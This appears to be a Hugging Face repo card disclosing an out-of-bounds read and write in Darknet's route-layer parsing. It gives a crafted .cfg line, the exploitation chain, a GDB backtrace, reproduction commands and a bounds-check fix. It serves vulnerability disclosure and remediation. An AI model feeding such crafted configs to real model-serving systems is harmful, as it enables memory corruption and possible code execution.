YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
PoC: pjreddie/darknet β parse_route() OOB Read β forward_route_layer OOB Write (CWE-129 β CWE-787)
Vulnerability
pjreddie/darknet is the original Darknet neural network framework. Its parse_route() function in src/parser.c reads layer indices from .cfg files via atoi() and uses them to index net->layers[index] without checking index >= 0 && index < net->n.
This OOB read value then propagates through the network construction and into the forward pass, where forward_route_layer() calls copy_cpu() with the garbage value as the copy count β resulting in a massive heap/stack out-of-bounds write.
Exploitation Chain (proven via GDB)
1. Malicious .cfg: [route] layers=0,5 (index 5 > net->n which is 3)
2. parse_route(): net->layers[5].outputs β OOB READ β garbage (e.g. 1,057,326,470)
3. make_route_layer(): xcalloc(garbage_outputs * batch, sizeof(float)) β corrupted alloc
4. forward_route_layer(): copy_cpu(N=garbage, X=corrupt_ptr, Y=output_buf)
5. copy_cpu (blas.c:378): for(i=0;i<N;++i) Y[i*INCY] = X[i*INCX] β ~1 billion OOB WRITES
GDB Backtrace (proof of write path)
#0 copy_cpu (N=1057326470, X=0x3f8000003f800000, Y=0x7ffdff52a010) at blas.c:378
#1 forward_route_layer at route_layer.c:91
#2 forward_network at network.c:280
#3 network_predict at network.c:774
#4 test_yolo at yolo.c:320
Impact
- Heap/stack out-of-bounds WRITE with attacker-influenced data (X pointer comes from OOB layer data)
- Potential RIP control via heap metadata corruption or function pointer overwrite
- Affects any service that parses user-supplied darknet
.cfgfiles (model serving, conversion tools, CI pipelines)
Reproduction
Phase 1: ASan proves OOB read at parse_route
git clone https://github.com/pjreddie/darknet.git
cd darknet
sed -i 's/^CFLAGS=.*/CFLAGS=-fsanitize=address -g -O0 -Wall -Wno-unused-result -Wno-unknown-pragmas -Wfatal-errors -fPIC/' Makefile
make -j$(nproc)
./darknet yolo test poc_malicious.cfg
Expected: ERROR: AddressSanitizer: heap-buffer-overflow src/parser.c:1087 in parse_route
Phase 2: GDB proves write path at copy_cpu
# Rebuild without ASan so OOB read succeeds and reaches forward pass
sed -i 's/^CFLAGS=.*/CFLAGS=-g -O0 -Wall -Wno-unused-result -Wno-unknown-pragmas -fPIC/' Makefile
make clean && make -j$(nproc)
echo -e "test.ppm\n" | gdb -batch -ex "run yolo test poc_malicious.cfg" -ex "bt 5" -ex "info args" ./darknet
Expected: SIGSEGV in copy_cpu at blas.c:378 with N=1057326470
Or run the automated script:
chmod +x reproduce_ace.sh
./reproduce_ace.sh
Files
poc_malicious.cfgβ crafted config withlayers=0,5(index 5 out of bounds)poc_ace_chain.cfgβ variant withlayers=0,100000(larger OOB)reproduce_ace.shβ automated reproduction (ASan + GDB phases)reproduce.shβ basic ASan-only reproductionparser.cβ real source from pjreddie/darknet showing vulnerable code at line 1087
Related
- CVE-2026-7482 "Bleeding Llama" (CVSS 9.1) β same class: unchecked file-supplied index/size in model loader
Suggested Fix
// parser.c, after line 617:
if(index < 0 || index >= net->n) {
fprintf(stderr, "route layer index %d out of range (net has %d layers)\n", index, net->n);
exit(1);
}